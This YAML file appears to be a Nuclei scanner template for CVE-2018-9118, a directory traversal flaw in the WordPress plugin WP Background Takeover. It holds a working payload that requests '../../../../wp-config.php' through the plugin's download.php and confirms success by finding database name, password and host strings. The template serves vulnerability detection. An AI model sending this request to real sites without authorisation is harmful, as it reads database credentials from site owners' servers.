nuclei-templates/cves/2018/CVE-2018-9118.yaml

32 lines
1004 B
YAML

id: CVE-2018-9118
info:
name: WP Background Takeover, Directory Traversal <= 4.1.4
author: 0x_Akoko
severity: high
description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
reference:
- https://www.exploit-db.com/exploits/44417
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-9118
cwe-id: CWE-22
tags: wordpress,wp-plugin,lfi,cve,cve2018,traversal
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and